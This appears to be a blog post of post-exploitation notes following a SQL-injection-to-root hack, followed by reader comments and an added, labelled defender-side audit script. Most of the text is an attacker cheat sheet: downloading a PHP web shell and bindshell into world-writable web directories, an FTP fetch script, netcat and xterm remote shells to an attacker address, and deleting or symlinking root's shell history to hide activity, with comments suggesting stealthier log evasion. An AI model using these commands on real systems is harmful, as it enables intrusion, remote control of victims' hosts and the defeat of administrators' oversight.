escalation
interesting hack by h3llfyr3
http://www.h4cki.org/index.php?title=From_a_4Images_SQL_Injection_to_Root_Access_-_Privilage_Escalation
Also some cool hacks from their peers!
find . -perm -2 -ls
The dot is the directory to search, so I would suggest doing:
cd /home/user/public_html/;find . -perm -2 -ls
It will then give you a list of folders and files that are world-writable. Don't forget that there are other downloaders than wget. The following command will show you which downloaders are installed on the box:
which wget curl w3m lynx
For wget:
wget --directory-prefix=[DIR HERE, NO EXTENSION] [URL HERE]
For curl:
curl -o /home/user/public_html/shell.php http://www.shell.txt
cat >bindshell.c
curl -o /home/user/public_html/bindshell.c http://www.server.com/bindshell.c
gcc bindshell.c -o bindshell
./bindshell
echo open 10.0.0.1 > file.txt
echo lcd /writeable/web/dir/ >> file.txt <-- this switches your local directory to one you can write to
echo user anonymous >> file.txt
echo pass anonymous@anon.com >> file.txt
echo get bindshell.c >>file.txt
echo bye >>file.txt
To execute:
ftp < file.txt
Other common techniques for a remote shell (RSH):
tftp -i attacker_ip file (nc)
nc -e /bin/sh -l -p port_number (netcat MUST be compiled with -DGAPING_SECURITY_HOLE for -e to exist)
If the victim host has an X terminal such as xterm:
xterm -display attack_ip:0.0 &
Check the last 20 entries in the history:
tail -20 /root/.bash_history
To remove the current .bash_history:
rm -rf /root/.bash_history
To disable command logging:
ln -s /dev/null /root/.bash_history
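From the defender's side, the two things this post leaves behind are easy to audit: world-writable paths under a web root (the same find -perm -2 test used above) and per-user shell history that has been neutralised, for example a .bash_history that is a symlink to /dev/null. The script below is an added example, not code from the original post or its commenters; the sample tree, user names and paths it builds are constructed for the demonstration.

```shell
#!/bin/sh
# Defender-side audit for the traces described in the post: world-writable paths
# under a web root and ~/.bash_history files that were symlinked to /dev/null or
# removed. Added example; the sample tree, user names and paths are constructed.

# List every world-writable file or directory under $1, sorted, one per line.
world_writable() {
    find "$1" -perm -2 -print 2>/dev/null | sort
}

# Classify one history file: symlink-devnull, missing, empty or ok.
history_status() {
    hist="$1"
    if [ -L "$hist" ] && [ "$(readlink "$hist")" = "/dev/null" ]; then
        echo symlink-devnull
    elif [ ! -e "$hist" ]; then
        echo missing
    elif [ ! -s "$hist" ]; then
        echo empty
    else
        echo ok
    fi
}

# Report "<user> <status>" for every home directory under $1 (e.g. /home).
audit_histories() {
    for d in "$1"/*/; do
        printf '%s %s\n' "$(basename "$d")" "$(history_status "$d.bash_history")"
    done
}

# Build a constructed sample tree inside a private temp dir and print its root.
make_sample() {
    umask 022                                   # predictable default modes
    root=$(mktemp -d)
    mkdir -p "$root/public_html/uploads" "$root/home/alice" "$root/home/bob"
    chmod 777 "$root/public_html/uploads"       # world-writable: must be flagged
    touch "$root/public_html/index.php"         # 0644: must not be flagged
    printf 'ls -la\n' > "$root/home/alice/.bash_history"   # normal history
    ln -s /dev/null "$root/home/bob/.bash_history"         # neutralised history
    echo "$root"
}

# Stand-alone run: audit the constructed tree, then clean up.
SAMPLE=$(make_sample)
world_writable "$SAMPLE/public_html"
audit_histories "$SAMPLE/home"
rm -rf "$SAMPLE"
```

On a real host, point world_writable at the web root and audit_histories at /home; an "empty", "missing" or "symlink-devnull" result for an account that is known to be used interactively is the thing to investigate.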
2 comments:
Wouldn't recommend this
> disable command logging
>ln -s /dev/null /root/.bash_history
it leaves a symlink to /dev/null, any competent admin will realise its purpose.
My preference
unset HISTFILE;unset SAVEHIST
Thanks, this is better!